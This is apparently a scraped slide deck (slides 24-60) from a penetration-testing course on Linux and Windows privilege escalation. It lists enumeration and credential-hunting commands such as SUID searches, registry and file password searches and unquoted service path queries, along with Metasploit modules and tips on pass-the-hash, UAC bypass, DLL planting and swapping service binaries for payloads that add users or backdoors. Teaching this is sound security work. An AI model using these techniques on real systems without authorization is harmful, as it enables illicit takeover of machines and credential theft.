  • 24. Privilege Escalation From 1 To 0 By : Hossam Mohamed # File Permissions • Check Files . • Edit And Run :) • More ! R = read => 4 W = write => 2 X = execute =>1
  • 25. Privilege Escalation From 1 To 0 By : Hossam Mohamed # SUID Files Allows you to run programs as another user upon execution Or in other word (with root) Local Exploits or BoF in SUID app will make you run as root SUID Files find / -user root - perm -4000 -print 2>/dev/null find / -perm -u=s - type f 2>/dev/null find / -user root - perm -4000 -exec ls - ldb {} ;
  • 26. Privilege Escalation From 1 To 0 By : Hossam Mohamed SUID Files find / -user root - perm -4000 -print 2>/dev/null find / -perm -u=s - type f 2>/dev/null find / -user root - perm -4000 -exec ls - ldb {} ;
  • 27. Privilege Escalation From 1 To 0 By : Hossam Mohamed Environment Variables # Dynamic linker # What's Dynamic linker Dot In PATH !
  • 28. Privilege Escalation From 1 To 0 By : Hossam Mohamed misconfigurations Webserver => Configs => credential's What if we got MySQL credential's Known Services Exploits modern Linux distributions security ps -ef | grep root
  • 29. Privilege Escalation From 1 To 0 By : Hossam Mohamed Exercise
  • 30. Privilege Escalation From 1 To 0 By : Hossam Mohamed Day 2
  • 31. Privilege Escalation From 1 To 0 By : Hossam Mohamed Windows Access Control Only "NTFS" formatted drive Cacls output • F (full access), M (modify access), RX (read and execute access) • R (read-only access) ,W (write-only access) # • (OI): object inherit, (CI): container inherit • (IO): inherit only, (NP): do not propagate inherit • (I): permissioninherited from parent container
  • 32. Privilege Escalation From 1 To 0 By : Hossam Mohamed Windows integrity levels (IL) Untrusted Low Medium High System Protected/Installer Check your user if local admin !!
  • 33. Privilege Escalation From 1 To 0 By : Hossam Mohamed Windows Files Premonitions Overwrite is always big plus Identify writeable files Recently Created Directories default permissions i/cacls utility Accesschk tool Write Read & Execute Read Full
  • 34. Privilege Escalation From 1 To 0 By : Hossam Mohamed From Local Admin To Domain Admin Pass The Hash Hashdump RDP, Add new Domain Admin Have Some Fun IT Admin Box Local Box Domain Box
  • 35. Privilege Escalation From 1 To 0 By : Hossam Mohamed Stealing NTLM From Web !! Automatic Logon Policy (Win HTTP) https://github.com/blazeinfosec/ssrf-ntlm/ MySQL LOAD DATA INFILE qprocess /server:15.15.45.41 Nltest Outlook CVE-2018-0950
  • 36. Privilege Escalation From 1 To 0 By : Hossam Mohamed Stealing NTLM Outlook CVE-2018-0950
  • 37. Privilege Escalation From 1 To 0 By : Hossam Mohamed User Account Control (UAC) • security feature of Windows isn't ! :) • Not a Security Boundary • prevent unauthorized changes to the operating system (Run App ..etc) • So UAC Is Issue For a pen tester !! UAC Bypass 1. COM Handler Hijack 2. Memory Injection 3. Some Registry Keys like (FodHelper - Eventvwr)
  • 38. Privilege Escalation From 1 To 0 By : Hossam Mohamed Credentials Credentials are everywhere . Configs - Backups Admin notes – Plaintext Passwords Encrypted Credentials Cashed Credentials (ftp – vnc .. Etc) Post/windows/gather/credentials/* grep => findstr c:sysprep.inf c:sysprep c:sysprep.xml c:Unattended.xml
  • 39. Privilege Escalation From 1 To 0 By : Hossam Mohamed Credentials Passwords in registry’s Putty – snmp reg query HKLM /f password /t REG_SZ /s
  • 40. Privilege Escalation From 1 To 0 By : Hossam Mohamed Credentials Have Groups.xml ! dir /s *pass* == *cred* == *vnc* == *.config* findstr /si password *.xml *.ini *.txt Password In Paper !
  • 41. Privilege Escalation From 1 To 0 By : Hossam Mohamed Users Information Local Administrators Check net localgroup administrators Domain user listing Get-ADUser -Filter * -SearchBase "dc=domain,dc=local" | select Name,SID
  • 42. Privilege Escalation From 1 To 0 By : Hossam Mohamed Users Information UserListing Net users Sessions qwinsta
  • 43. Privilege Escalation From 1 To 0 By : Hossam Mohamed Massing patches Kernel Exploits Discovery of Missing Patches wmic qfe get Caption,Description,HotFixID,InstalledOn Or kill AV post/windows/gather/enum_patches
  • 44. Privilege Escalation From 1 To 0 By : Hossam Mohamed Applications Local Exploit Our friend exploit-db Maybe it’s not about Privilege escalation exploits only RCE system privilege!! You maybe have other way ! post/multi/recon/local_exploit_suggester
  • 45. Privilege Escalation From 1 To 0 By : Hossam Mohamed Services exploitation As we see , windows privilege escalation exploitation tecnics will start from here ☺ Quick look at exploit db More then 60% of windows privilege escalation exploitation about services! It’s sound like ohh I thin that’s easy Good to have powershell knowledge Let’s get involved!!
  • 46. Privilege Escalation From 1 To 0 By : Hossam Mohamed Services exploitation Identify running services. Net config / services under your control Say hello to your new friend “sc” What’s sc ? Sc query /list all of the services on the machine post/windows/gather/enum_services
  • 47. Privilege Escalation From 1 To 0 By : Hossam Mohamed Services exploitation Let’s start analysis what we got ! Local administrator or services account! Local System - Network Service - Local Service Do you really want to get other limited shell ? Just Get Hash’s and go home to crack and come back Get-ADDefaultDomainPasswordPolicy / I thin you will know how much time it will take to crack it !!
  • 48. Privilege Escalation From 1 To 0 By : Hossam Mohamed Services exploitation Normal Service Exploitation some checks Services are automatically starting? Services are controlled? Can you overwrite Service binary? Congratulations you own the box Note : “in modern os sometimes, when you replace services binary with metasploit payload you will lose the shell after 1 min that’s bcs the app crash , so make sure that your payload is about simple task ! “ like install backdoor or add user
  • 49. Privilege Escalation From 1 To 0 By : Hossam Mohamed Services exploitation Want some CVE into your CV ? I will tell you a trick :”) “Unquoted services paths” or trusted paths What’s that ? It’s about space and “ C:Program Filesblabla appstart.exe C:Program*Filesblabla*appstart.exe All of the * are vulnerable points If you failed in A plan , there are other 25 alphabet to try with it :”)
  • 50. Privilege Escalation From 1 To 0 By : Hossam Mohamed Services exploitation Identify Unquoted services wmic service get name,displayname,pathname,startmode |findstr /i “auto” |findstr /i /v “c:windows” |findstr /i /v “”” Identify services account level !! Check Write access ! Icacls /Service path/ Check control Net config | findstr services name Or if it’s automatically start , check if you can restart the box exploit/windows/local/trusted_service_path
  • 51. Privilege Escalation From 1 To 0 By : Hossam Mohamed Services exploitation Registry Permissions It’s not common “Adminisrators only who have write prem by default “ But ! It’s easy to exploit Services listing in regedit HKEY_LOCAL_MACHINESYSTEMCurrentControlSetservi ces Take look and check if you can change the path ! Good luck! If you are in windows box GUI access is just a option It’s depends on you !
  • 52. Privilege Escalation From 1 To 0 By : Hossam Mohamed Named pipes exploitation What’s Pipes ?! IO ninja Pipeslist check your pipes Metasploit : getsystem Fuzzing demo
  • 53. Privilege Escalation From 1 To 0 By : Hossam Mohamed DLL Injection Windowscan dynamicallyload DLLs What if DLL is Missing ? LoadLibrary(“iamalib.dll”) LoadLibrary(“c:program filesiamalib.dll”)
  • 54. Privilege Escalation From 1 To 0 By : Hossam Mohamed DLL Injection Not found ? Windowsattempts to locate the DLL by searching a well-defined set of directories "DLL preloading attack or a binary planting attack" How the searching operate work ? HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControl Session ManagerKnownDLLs
  • 55. Privilege Escalation From 1 To 0 By : Hossam Mohamed More Exploits CVE-2018-1038 Total Meltdown Windows 7 & 2008 R2 Some Kernel Exploits Windows 10 https://blog.xpnsec.com/total-meltdown-cve-2018-1038/ Also There are a good book for kernel exploitation "A Guide to Kernel Exploitation: Attacking the Core"
  • 56. Privilege Escalation From 1 To 0 By : Hossam Mohamed AutoRun AutoRuns tool Check Paths Can You Overwrite ? Restart Got SYSTEM Account :")
  • 57. Privilege Escalation From 1 To 0 By : Hossam Mohamed Binary Replacements Check Imported Binary C:WindowsSystem32sethc.exe Registers Check • RunAs • RunOnce • RenameOnReboot • AlwaysInstallElevated • SRP Policy Enumeration
  • 58. Privilege Escalation From 1 To 0 By : Hossam Mohamed Other Checks • Virtual Image Backups / Storage VMDK - VHD / VHDX - OVA - ISO – IMG • Source code of applications running • Default passwords for installed applications • Default configuration file locations What's Stored on Network Shares ? Task manager
  • 59. Privilege Escalation From 1 To 0 By : Hossam Mohamed I Think This the end :") Nice To Meet You All !! @wazehell
  • 60. Privilege Escalation From 1 To 0 By : Hossam Mohamed